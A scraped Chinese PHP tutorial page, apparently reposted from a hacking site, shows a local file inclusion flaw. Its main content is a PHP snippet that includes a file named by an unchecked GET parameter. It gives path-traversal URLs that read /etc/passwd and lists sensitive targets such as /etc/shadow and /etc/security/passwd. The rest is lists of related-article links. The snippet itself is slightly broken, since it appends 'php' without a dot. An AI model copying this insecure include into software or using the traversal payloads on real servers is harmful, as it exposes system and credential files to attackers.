编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

PHP入门学习笔记之一

Oct 12 PHP

php定界符

Jun 19 PHP

PHP中的日期加减方法示例

Aug 21 PHP

微信支付PHP SDK之微信公众号支付代码详解

Dec 09 PHP

thinkphp实现163、QQ邮箱收发邮件的方法

Dec 18 PHP

php+html5+ajax实现上传图片的方法

May 14 PHP

PHP Header用于页面跳转时的几个注意事项

Oct 21 PHP

PHP之十六个魔术方法详细介绍

Nov 01 PHP

遍历echsop的region表形成缓存的程序实例代码

Nov 01 PHP

PHP实现接收二进制流转换成图片的方法

Jan 10 PHP

Yii框架的布局文件实例分析

Sep 04 PHP

discuz论坛更换域名,详细文件修改步骤

Dec 09 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

JOIN(1) pdf(1) form表单(1) cypress(1) 变量提升(1) ant design(2) Eclipse(1) 缓冲区(1) 弹窗(1) JDBC(3)

You might like

php面向对象的方法重载两种版本比较

2008/09/08 PHP

php学习笔记 PHP面向对象的程序设计

2011/06/13 PHP

全新的PDO数据库操作类php版（仅适用Mysql）

2012/07/22 PHP

Smarty使用自定义资源的方法

2015/08/08 PHP

php的api数据接口书写实例(推荐)

2016/09/22 PHP

PHP第三方登录―QQ登录实现方法

2017/02/06 PHP

DOM 脚本编程中的兄弟节点

2009/10/31 Javascript

javascript iframe编程相关代码

2009/12/28 Javascript

Exjs 入门篇

2010/04/07 Javascript

js focus不起作用的解决方法(主要是因为dom元素是否加载完成)

2010/11/05 Javascript

动态添加option及createElement使用示例

2014/01/26 Javascript

JavaScript给按钮绑定点击事件（onclick）的方法

2015/04/07 Javascript

jQuery编写设置和获取颜色的插件

2017/01/09 Javascript

微信小程序技巧之show内容展示，上传文件编码问题

2017/01/23 Javascript

网页中右键功能的实现方法之contextMenu的使用

2017/02/20 Javascript

详解webpack进阶之插件篇

2017/07/06 Javascript

vue中v-model动态生成的实例详解

2017/10/27 Javascript

vue input实现点击按钮文字增删功能示例

2019/01/29 Javascript

Vue项目history模式下微信分享爬坑总结

2019/03/29 Javascript

layui table 表格上添加日期控件的两种方法

2019/09/28 Javascript

vue.js中ref及$refs的使用方法解析

2019/10/08 Javascript

浅析微信小程序modal弹窗关闭默认会执行cancel问题

2019/10/14 Javascript

jQuery与原生JavaScript选择HTML元素集合用法对比分析

2019/11/26 jQuery

[58:21]DOTA2亚洲邀请赛 4.3 突围赛 Liquid vs VGJ.T 第二场

2018/04/04 DOTA

python3.6+django2.0开发一套学员管理系统

2018/03/03 Python

在Pycharm中项目解释器与环境变量的设置方法

2018/10/29 Python

简单了解Python matplotlib线的属性

2019/06/29 Python

英国在线药房和在线药剂师：Chemist 4 U

2020/01/05 全球购物

动态密码技术

2012/10/18 面试题

《在山的那边》教学反思

2014/02/23 职场文书

法制宣传教育方案

2014/05/09 职场文书

房地产开发项目建议书

2014/05/16 职场文书

竞选学委演讲稿

2014/09/13 职场文书

文员试用期转正自我鉴定

2014/09/14 职场文书

公司捐书倡议书

2015/04/27 职场文书

战友聚会致辞

2015/07/28 职场文书